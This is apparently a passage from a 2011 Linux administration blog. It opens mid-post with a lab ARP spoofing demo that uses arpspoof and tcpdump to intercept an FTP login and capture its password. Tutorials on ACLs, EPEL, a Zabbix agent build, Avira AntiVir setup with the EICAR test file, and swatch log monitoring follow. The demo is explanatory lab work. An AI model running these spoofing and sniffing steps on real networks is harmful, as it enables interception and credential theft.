? (192.168.1.10) at 00:0c:29:69:81:47 [ether] on eth0

javi@victim:~$ arp -a
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
? (192.168.1.11) at 00:0c:29:18:36:e6 [ether] on eth0

Next step is to alter those tables by transmitting fake ARP frames.

root@attacker:~# arpspoof -i eth0 -t 192.168.1.10 192.168.1.11
0:c:29:20:9f:9b 0:c:29:69:81:47 0806 42: arp reply 192.168.1.11 is-at 0:c:29:20:9f:9b
...

root@attacker:~# arpspoof -i eth0 -t 192.168.1.11 192.168.1.10
0:c:29:20:9f:9b 0:c:29:18:36:e6 0806 42: arp reply 192.168.1.10 is-at 0:c:29:20:9f:9b
...

If we output the ARP tables again, we can see that the entries have been changed.

javi@ubuntu-server:~$ arp -a
? (192.168.1.20) at 00:0c:29:20:9f:9b [ether] on eth0
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
? (192.168.1.10) at 00:0c:29:20:9f:9b [ether] on eth0

javi@victim:~$ arp -a
? (192.168.1.11) at 00:0c:29:20:9f:9b [ether] on eth0
? (192.168.1.1) at 00:60:b3:50:ab:45 [ether] on eth0
? (192.168.1.20) at 00:0c:29:20:9f:9b [ether] on eth0

At this point, the attacker is ready to sniff all traffic between the implicated nodes. To simplify the test, just the FTP data will be picked up. In this case, I am dumping all FTP packets within a text file with tcpdump, so as to be able to analyze them before with Wireshark. I could also use Wireshark directly by means of a filter.

root@attacker:~# tcpdump -ni eth0 port 21 -s0 -w ftp.pcap

Last step is to establish a FTP session between victim and ubuntu-server.

javi@victim:~$ ftp 192.168.1.11
Connected to 192.168.1.11.
220 (vsFTPd 2.3.2)
Name (192.168.1.11:javi): javi
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Now we are going to open the captured file through Wireshark. As you can distinguish, the password has been catched.




In addition, if you follow the TCP stream, you will be able to find out that there are several retransmissions. That occurs because the attacker has to forward the TCP/IP packets. This sequence would come out as well if you run tcpdump on ubuntu-server.

And finally, also mention that if IP forwarding was not activated, we would be causing a Denial of Service attack (DoS), due to the communication would be cut out.


Oct 19, 2011

Access Control Lists (II)

In the preceding article about Access Control List, we saw how to grant permissions either on a file or directory for a particular user, and in addition, how to set those ones for new elements by default.

Now, we are going to give permissions to the nobody group and other users. Note that when you are applying ACLs for other users, it is like when you are handling the chmod command.

[root@centos logs]# setfacl -m g:nobody:-w- 002.log

[root@centos logs]# setfacl -m o:rw- 002.log

[root@centos logs]# getfacl 002.log 
# file: 002.log
# owner: root
# group: root
user::rw-
user:nobody:r-x
group::---
group:nobody:-w-
mask::rwx
other::rw-

In order to remove ACLs, we may delete them for a specific user, clear all entries or only get rid of the default ACLs.

[root@centos logs]# setfacl -x g:nobody 002.log

[root@centos /]# setfacl -R -b /logs

[root@centos /]# setfacl -k /logs

Other handy option for ACLs is to associate a mask with an ACL, that is to say, to establish real or effective permissions on a file or directory. In this case, we are limiting the permissions available on a file or directory. For instance, in the following case we are setting read, write and execution permissions for nobody user, but afterwards, we are also applying a mask of just execution.

[root@centos logs]# setfacl -m u:nobody:rwx 002.log

[root@centos logs]# setfacl -m m:--x 002.log

[root@centos logs]# getfacl 002.log
# file: 002.log
# owner: root
# group: root
user::rw-
user:nobody:rwx                 #effective:--x
group::---
mask::--x
other::rw-


Oct 13, 2011

Extra Packages for Enterprise Linux (EPEL)

Today I am going to fill you in on EPEL, a repository maintained by a Fedora group (made up by Red Hat engineers, volunteer community members, etc.) which offers a set of additional packages for Enterprise Linux distributions, such as RHEL, CentOS, Scientific Linux and so on.

For instance, when you purchase a license for RHEL, Red Hat guarantees you support for a series of packages included within its repositories, but other many applications are not provided through them.

Thereby, you have got several options to install packages not located into the official repositories, such as grabbing them from RPM PBone. But another smart option is to set up on your machine, an EPEL repository, whereby you will have high quality add-on packages which will complement your system.

EPEL packages are built from the equivalent ones in Fedora project and they are updated as far as the corresponding RHEL release is supported.

There are EPEL repositories for RHEL4, RHEL5 and RHEL6 (they are too valid for their derived). For my tests, I am going to use a CentOS 6.0 distro where I will install the appropiate 'epel-release' package. By default, only the stable EPEL repository is enabled. Later, you might enable testing and not yet considered stable repositories (I don't recommend it).

[root@centos ~]# rpm -ivh http://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-5.noarch.rpm

[root@centos ~]# ls -l /etc/yum.repos.d/epel*
-rw-r--r--. 1 root root  957 oct 12  2010 /etc/yum.repos.d/epel.repo
-rw-r--r--. 1 root root 1056 oct 12  2010 /etc/yum.repos.d/epel-testing.repo

How can we check out if a package comes from EPEL?

[root@centos ~]# yum install keychecker

[root@centos ~]# keychecker httpd
CentOS-6 Key (CentOS 6 Official Signing Key)
--------------------------------------------
httpd-2.2.15-5.el6.centos.i686

[root@centos ~]# keychecker keychecker
EPEL (6)
--------
keychecker-0.2-2.el6.noarch

Other way is by using yum.

[root@centos ~]# yum info htop
...
Repo       : epel
Summary    : Interactive process viewer
...


Oct 4, 2011

Access Control Lists (I)

One month ago I had to publish the log files of one application at work. The log directory had to be accessible by the development team (they use Windows). Also say that the application runs on CentOS 6.0

No problem. I shared the directory through Samba and granted access to the guest user (on Linux, this is translated to the nobody user).

[root@centos ~]# cat /etc/samba/smb.conf 
[global]
        security      = user
        map to guest  = bad user
        guest account = nobody

[logs]
        path     = /logs
        readonly = yes
        guest ok = yes

Later I was warned that certain files could not be read. By taking a look at it, I could see that some files were been created with wrong permissions.

[root@centos ~]# ls -l /logs/
total 6148
-rw-------. 1 root root 4730880 oct  4 11:37 001.log
-rw-------. 1 root root 1564672 oct  4 11:37 002.log

As you can appreciate, the files just could be read by the owner, in this case root. This was the second problem: the application ran as root and of course, I could not allow access by means of this user.

We opened a ticket to the support center, in order to find out if it were possible to force the program to create the log files with other permissions. The response was fantastic: set up a cron task so as to change them periodically. As I usually say... a real botched.

Fortunately, Linux is a great operating system which if you know it in depth, you will be able to solve problems in different ways.

I sized up the situation and I decided that the best option was to set an ACL (Access Control List). With ACLs, you can give selected users, read, write and execute permissions on a specific file or directory.

First up, you need to have configured the target filesystem with the acl option.

[root@centos ~]# mount -o remount,acl /

[root@centos ~]# cat /etc/fstab
/dev/mapper/vg_centos-lv_root   /       ext4    defaults,acl    1 1
...

Then, you must grant the nobody user, read and execute permissions on all elements of the directory and besides, new files or directories created within it, will also have this ACL by default.

[root@centos ~]# setfacl -R -m u:nobody:r-x /logs

[root@centos ~]# setfacl -d -R -m u:nobody:r-x /logs

In this manner, when a user logs on via Samba (guest user), will be able to read the files. Let's get now the full permissions from any of the files included into the logs directory.

[root@centos ~]# getfacl /logs/001.log
# file: logs/001.log
# owner: root
# group: root
user::rw-
user:nobody:r-x
group::---
mask::r-x
other::---

As you can see above, apart from root, the nobody user can also read the file.

It may seem incredible but ACLs are not well known. I have seen throughout my professional life, authentic disasters by applying permissions on files, mainly due to ignorance of the administrators.

And as you have been able to learn, ACLs are an elegant way to handle the file permissions. Next week I will end up this article with other stuff that you can perform with ACLs.


Sep 28, 2011

Zabbix client installation on Ubuntu

Through this article, I wanted to write down how to set up the Zabbix client from its source code on Ubuntu distributions. Some time ago I posted a similar article but utilizing a CentOS host. For this case, I am going to accomplish the same task but choosing an Ubuntu Server 11.04 and Zabbix 1.8.7.

First of all, we need to download the source code from the Zabbix web site and decompress it inside the server. We must have installed too the build-essential package, so as to be able to compile the Zabbix client.

root@ubuntu-server:~# aptitude install build-essential

root@ubuntu-server:~/zabbix-1.8.7# ./configure --enable-agent

root@ubuntu-server:~/zabbix-1.8.7# make ; make install

Once we have correctly compiled and installed the Zabbix agent, next step is to create the appropiate directories, copy the configuration files and add a new user to the system called zabbix.

root@ubuntu-server:~/zabbix-1.8.7# mkdir -p /etc/zabbix/alert.d /var/log/zabbix /var/run/zabbix

root@ubuntu-server:~/zabbix-1.8.7# cp -a misc/conf/zabbix_agentd.conf /etc/zabbix/

root@ubuntu-server:~/zabbix-1.8.7# cp misc/init.d/ubuntu/zabbix-agent.conf /etc/init/

root@ubuntu-server:~/zabbix-1.8.7# useradd -r -d /var/run/zabbix -s /sbin/nologin zabbix

root@ubuntu-server:~/zabbix-1.8.7# chown zabbix:zabbix /var/run/zabbix /var/log/zabbix

Afterwards, we must edit the minimum information required for the Zabbix agent configuration file and in addition, it is also neccesary to establish an Upstart file for starting up and stopping the Zabbix agent service.

root@ubuntu-server:~# cat /etc/zabbix/zabbix_agentd.conf
...
# Zabbix client PID file
PidFile=/var/run/zabbix/zabbix_agentd.pid

# Zabbix client log file
LogFile=/var/log/zabbix/zabbix_agentd.log

# Allow remote commands from zabbix server
EnableRemoteCommands=1

# Maximum time for processing
Timeout=10

# System hostname
Hostname=ubuntu

# Zabbix server IP
Server=192.168.1.100


root@ubuntu-server:~# cat /etc/init/zabbix-agent.conf
# Start zabbix agent

pre-start script
   if [ ! -d /var/run/zabbix ]; then
           mkdir -p /var/run/zabbix
           chown zabbix:zabbix /var/run/zabbix
   fi
end script

start on filesystem
stop on starting shutdown
respawn
expect daemon
exec /usr/local/sbin/zabbix_agentd

The last point is to register the ports used by Zabbix into the services file and run the agent.

root@ubuntu-server:~# echo "zabbix-agent    10050/tcp  Zabbix Agent"   >> /etc/services
root@ubuntu-server:~# echo "zabbix-agent    10050/udp  Zabbix Agent"   >> /etc/services
root@ubuntu-server:~# echo "zabbix-trapper  10051/tcp  Zabbix Trapper" >> /etc/services
root@ubuntu-server:~# echo "zabbix-trapper  10051/udp  Zabbix Trapper" >> /etc/services


root@ubuntu-server:~# start zabbix-agent


Sep 21, 2011

Avira AntiVir Personal on Linux (IV)

With this post, I am going to end up the series of articles about Avira Antivir Personal on Linux. So, let's take a look at one of its more important modules: AntiVir Guard.

AntiVir Guard takes care of scanning and protecting a filesystem on real-time, that is to say, a virus will be detected before accessing on it. How does it work? All directories which we want to protect by AntiVir Guard, will be mounted through DazukoFS module, previously compiled and inserted into the kernel.

[root@centos ~]# cat /etc/fstab
...
/home    /home    dazukofs 

AntiVir Guard (avguard) can be handled either by means of the avguard command or as an init daemon. In this article, I am going to focus on the second option, since it's most useful and handy.

Thereby, we have to set it up by editing its configuration file (/etc/avira/avguard.conf). Below I am going to note the most important features.

[root@centos ~]# vi /etc/avira/avguard.conf
...
# It will try to delete the problem from the infected file (by default is disabled).
# If the repair fails, the AlertAction is carried out.
RepairConcerningFiles

# Once a virus is detected, the access to the file is blocked and the action is logged.
# This allows you to specify an additional action to be followed for the concerning file.
# none or ignore: no further action (by default).
# rename or ren: rename the file by adding the .XXX extension.
# delete or del: delete the concerning file.
# quarantine: move the concerning file into quarantine.
AlertAction delete

# If quarantine option is selected, the infected files are moved into it.
QuarantineDirectory /home/quarantine

# Types of files to be scanned.
# extlist: scan only files with certain extensions.
# smart: scan files based on both their name and content.
# all: scan all files (by default).
ScanMode all

# File where all important operations are logged.
LogFile /var/log/avguard.log

# Detection of harmful or unwanted software (dial-up programs, jokes, faked emails, etc.).
# With the 'alltypes' option, all supported malware types will be detected.
DetectPrefixes adspy=yes appl=no bdc=yes dial=yes game=no joke=no pck=no phish=yes spr=no

# Activate the heuristics for macro virus in office documents.
# [yes (by default) | no].
HeuristicsMacro yes

# Set the level of heuristic detection in all types of files.
# Available values are 0 (off), 1 (low - by default), 2 (medium) and 3 (high).
HeuristicsLevel 2


[root@centos home]# /etc/init.d/avguard restart

To check it out, we are going to download the EICAR file into the /home directory and try out to dump it.

[root@centos home]# wget https://secure.eicar.org/eicar.com.txt

[root@centos home]# cat eicar.com.txt 
cat: eicar.com.txt: Operation not supported

[root@centos home]# tail -f /var/log/avguard.log 
2011-09-18 18:52:48 centos.local avguard.bin[1396]: AVGU: ALERT AntiVir ALERT for file "/home/eicar.com.txt": Details:        Eicar-Test-Signature ; virus ; Contains code of the Eicar-Test-Signature virus
2011-09-18 18:52:48 centos.local avguard.bin[1396]: AVGU: INFO The concerning file /home/eicar.com.txt has been removed from disk.
2011-09-18 18:52:48 centos.local avguard.bin[1396]: AVGU: INFO Info: the alert in file /home/eicar.com.txt was handled. Action(s) taken: access denied, condition logged, file deleted

As you have been able to appreciate, the infected file has been removed when we have tried to read it. So imagine the amount of possibilities which turn out from this module, such as to analyze on-real time a file uploaded to a FTP or HTTP (WebDAV) server, or for instance, you might use tools like swatch in order to send an alert or execute a task.


Sep 12, 2011

Monitoring logs with swatch

Swatch is a GPL tool programmed in Perl which allows monitoring logs on real-time, and it is aimed to be able to execute an action when a certain situation takes place.

An application can register an event into a file as a result of an error, warning, etc., and at that moment, it may be interesting to restart the involved service or for instance, to send an email reporting the alarm, all automatically.

Here is where swatch turns up. You have got two ways to install it: either by means of the package which each distribution keeps in its repositories or directly by compiling the source code.

In the case of Ubuntu, the installation is really simple: aptitude install swatch. But in RHEL or CentOS, the package is not available in the official repositories of such distributions.

Therefore, in the present article I am going to develop the installation of swatch (3.2.3) on CentOS 6.0 (32 bits, minimal installation) by downloading and installing the suitable packages from RPM PBone Search.

[root@centos tmp]# rpm -i perl-Carp-Clan-6.03-2.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Bit-Vector-7.1-2.el6.i686.rpm
[root@centos tmp]# rpm -i perl-Date-Calc-6.3-2.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Date-Manip-5.54-4.el6.noarch.rpm 
[root@centos tmp]# rpm -i perl-TimeDate-1.16-11.1.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Time-HiRes-1.9721-115.el6.i686.rpm
[root@centos tmp]# rpm -i perl-File-Tail-0.99.3-8.el6.noarch.rpm
[root@centos tmp]# rpm -i perl-Mail-Sendmail-0.79-12.el6.noarch.rpm

[root@centos tmp]# rpm -i swatch-3.2.3-2.el6.noarch.rpm

So that swatch can send alarms by email, you have to install some kind of MTA (Mail Transfer Agent) on your system, such as Postfix.

[root@centos ~]# yum install postfix

[root@centos ~]# cat /etc/postfix/main.cf
...
# Internet hostname
myhostname = centos.local

# Local Internet domain name
mydomain = local

# Domain that locally-posted mail appears to come from
myorigin = $myhostname

# Network interface addresses to receive mail
inet_interfaces = all

# List of domains to consider itself the final destination
mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
...

[root@centos ~]# service postfix restart

[root@centos ~]# chkconfig postfix on

Through the following example, we will control the /var/log/secure file in order to detect the login of the user javi (we must look for the string "Accepted password for javi").

First of all, we have to create a directory to drop off the configuration files of swatch. Afterwards, we must set up a file with the needed instructions to log the access for the user javi.

[root@centos ~]# mkdir /etc/swatch

[root@centos ~]# cat /etc/swatch/swatch.conf
watchfor /Accepted password for javi/
        mail addresses=root\@centos.local,subject="Session opened by javi"

With the previous line, swatch will monitor the content of a concrete file which will be later given with the target of matching the requested string. When the coincidental text is found, an email will be passed down.

So as to start swatch, we must run the next command ('-t' option comes from the traditional 'tail -f'). If instead of using '-t' parameter, you add '-f', swatch would execute the defined configuration once and then, close the file. In this manner, the file is not open as in the case of a typical 'tail -f'.

[root@centos ~]# swatch -c /etc/swatch/swatch.conf -t /var/log/secure

Swatch has got other many options for its configuration file, such as outputting the matched pattern, sending a bell, executing commands and so on. The following example watches for a couple of strings.

[root@centos ~]# cat /etc/swatch/swatch.conf
watchfor /Accepted password for javi|Accepted password for pepe/
    echo=red


Sep 6, 2011

Avira AntiVir Personal on Linux (III)

Now we have installed Avira AntiVir Personal on Linux (II), in this article I am going to treat one of its main modules: AntiVir Command Line Scanner (avcan).

This component is launched from the command prompt (on-demand), and it takes care of analyzing files in order to look for possible malware infections. Avscan can delete, repair, isolate or simply warn.

One of the most powerful advantages of this kind of tool is which can be integrated with scripts. In this way, you may use it for example with a web service, where the files are uploaded and it can be neccesary to scan them before storing the files into the hard drive.

Avcan can be configured by means of its own configuration file (/etc/avira/avscan.conf). In this manner, when you run the scanner, this will utilize the options established into the file (by default).

But indeed, the most interesting possibility is to be able to set the scanning options when you execute it (on real-time), because for instance, you might have various scanning tasks with different types of analysis.

Then let's take a look at the principal features of avcan. For this purpose, I will download the EICAR test file (harmless virus used to try out the behaviour of an antivirus).

[root@centos ~]# wget https://secure.eicar.org/eicar.com

[root@centos ~]# avscan -h
syntax: avscan [option ...] [directory] [filename] ...
...

When a virus is detected, you may choose between several actions: ignore the alert (none or ignore), remove the file (delete or del), change the name of the file (rename or ren) or move the file into the quarantine area (quarantine). You can also add the '-e' parameter so that the infected file is repaired whenever possible.

[root@centos ~]# avscan --batch --alert-action=quarantine eicar.com

[root@centos ~]# avscan --batch --alert-action=delete -e eicar.com

By adding the '--batch' parameter, we are avoiding to be asked by avscan during the analysis, and all decisions are performed based on the configuration file and command-line settings.

Other option is to detect certain categories of software which are not considered malware, such as jokes programs (joke), files compressed with an unusual tool (pck), dial-up programs (dial) and so on. With the 'alltypes' option, all available types will be treated.

[root@centos ~]# avscan --batch --alert-action=delete --detect-prefixes="joke=yes phish=yes" eicar.com

[root@centos ~]# avscan --batch --alert-action=delete --detect-prefixes=alltypes eicar.com

Regarding the virus analysis, other important option is to enable the heuristic scanning. Avcan is able to use heuristics to conclude if a certain file is malicious. This allows that new or unknown code can be detected before an update. The level of heuristics increases the intensity of the scanning: 0 (off), 1 (low, by default), 2 (medium) and 3 (high).

[root@centos ~]# avscan --batch --alert-action=delete --heur-level=3 eicar.com

By default, avscan decides what files must be scanned from their name or content (smart). You can force it to scan files according to their filename extensions (extlist) or analyze all files regardless of their name or content (all).

[root@centos ~]# avscan --batch --alert-action=delete --scan-mode=all dir/

With respect to the directories, if you want to enable the recursive scanning of all subdirectories within a specific path, you will have to add the '-s' parameter.

And finally, also point out that avscan returns a code after ending the analysis, and it can be really useful to be managed through scripts.

[root@centos ~]# avscan --help
...
list of return codes:
   0: Normal program termination, nothing found, no error
   1: Found concerning file
   3: Suspicious file found
   4: Warnings were issued
 255: Internal error
 254: Configuration error (invalid parameter in command-line
      or configuration file)
 253: Error while preparing on-demand scan
 252: The avguard daemon is not running
 251: The avguard daemon is not accessible
 250: Cannot initialize scan process
 249: Scan process not completed
 248: No valid license found
 211: Program aborted, because the self check failed

[root@centos ~]# avscan --batch --alert-action=delete eicar.com

[root@centos ~]# echo $?
1

If you want to review the rest of options, you can check the avscan.conf file or run the '--help' parameter.


Aug 30, 2011

Avira AntiVir Personal on Linux (II)

Once we have installed DazukoFS on the system - Avira AntiVir Personal on Linux (I) -, we are going ahead with the installation of Avira AntiVir 3.1.3.5.

[root@centos tmp]# wget http://dlpe.antivir.com/package/wks_avira/unix/en/pers/antivir_workstation-pers.tar.gz

[root@centos tmp]# tar xvzf antivir_workstation-pers.tar.gz ; cd antivir-workstation-pers-3.1.3.5-0

The installation process is carried out by means of a bash script. After agreeing the license, the installer asks if we want to create a link for avupdate-guard.

[root@centos antivir-workstation-pers-3.1.3.5-0]# ./install
...
Would you like to create a link in /usr/sbin for avupdate-guard ? [y]
linking /usr/sbin/avupdate-guard to /usr/lib/AntiVir/guard/avupdate-guard ... done

Then the script can establish a cron task (/etc/cron.d/avira_updater) for automatic updates.

Would you like to setup Scanner update as cron task ? [y]
...
What time should updates be done [00:15]?
creating Scanner update cronjob ... done

The previous task checks if there is any update related to the scanner, engine or vdf files. On the contrary, if you accept the next request, the Guard module will be also updated periodically.

Would you like to check for Guard updates once a week ? [n]

setup internet updater complete

Next step takes care of installing DazukoFS. Due to this operation was previously accomplished, it will not be necessary to repeat it.

Preinstalled dazukofs module found on your system.

Would you like to reinstall dazukofs now ? [y] n
Dazukofs module is loaded

Through the following question, you can specify what directories must be protected by AntiVir Guard. I have selected the default option. Later, you may change this choice or add more directories by editing the fstab file.

Watch out with this selection, because regardless of the antivirus used, when you set up an on-access daemon, you have to avoid certain directories such as /sys, /proc, /root or directly /.

Guard will automatically protect all directories which are mounted upon dazukofs filesystem.

Please specify at least one directory to be protected by Guard to add in /etc/fstab : [/home]
The following directories will be protected by Guard:
/home

Then the installer verifies if the quarantine directory exists. This directory is used to isolate a suspect or infected file, so as to be able to repair it later.

Would you like to create /home/quarantine ? [y]
creating /home/quarantine ... done

Afterwards, you are asked if you want to make a link to AntiVir Guard and whether it should be automatically activated at system start.

Would you like to create a link in /usr/sbin for avguard ? [y]
linking /usr/sbin/avguard to /usr/lib/AntiVir/guard/avguard ... done

Please specify if boot scripts should be set up.
Set up boot scripts ? [y]

With the last step, we run AntiVir Guard.

Would you like to start AVIRA Guard now? [y]
Starting AVIRA AntiVir Workstation Personal ...
Starting: avguard.bin

After ending up the installation, it is highly recommended to perform a complete update of the application.

[root@centos ~]# avupdate-guard --product=Guard